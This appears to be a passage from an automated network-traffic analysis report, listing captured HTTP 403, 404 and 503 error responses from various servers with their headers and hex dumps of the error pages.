                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:54:16 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GKsHs%2Fkq%2FvJQ1Z93W28dRRvGdEVPF95nrfsSVl%2BFJi8kEaYI8QJw%2Fk9w1H3qTDwM28fj2FuLD5aECvFOcsfI24ZWffWoL68ZOgECaJNIrjc3SmCbJreHjQBoRS6iQYAK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e919832901c-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudfl
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487641.8834076812039076X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:54:01 GMTX-Served-By: cache-lin2290026-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KvxIl911PKpWsWOzhPjUu/,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 362f1daf-01bc-4af8-897b-f5eac058b6bfCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTKSWpYn7v8reFcz%2FqNrF92gtFbMpCtXD76Z2Yv5oLi89qAru56LdB5yjtfBpZ00J6LArVnwkZ2wB1Joq06jOWFv5M5Sj5DYAxZye6MkpCT7Lqyg383oREWGwmJP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=371.999979Server: cloudflareCF-RAY: 7ed76e8fcf7c39c4-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:01 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:54:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:54:03 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: aad7a90f-b237-4144-bdd4-786d3107d965CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qNsFus3syvb7GD%2Fu6ElLcnhd7Oo87UBrfToez8%2F8bBXG4hox0Rxemyn%2ByzmZThmHN4ifozgP9Yvp1JyrfcxwL7ewWkSBxpTCXQNTVVj2X8P3a1QfrBJaQ5b5OazkGU5zJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7ed76ea1e9ae3a7c-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:53:55 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:54:07 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
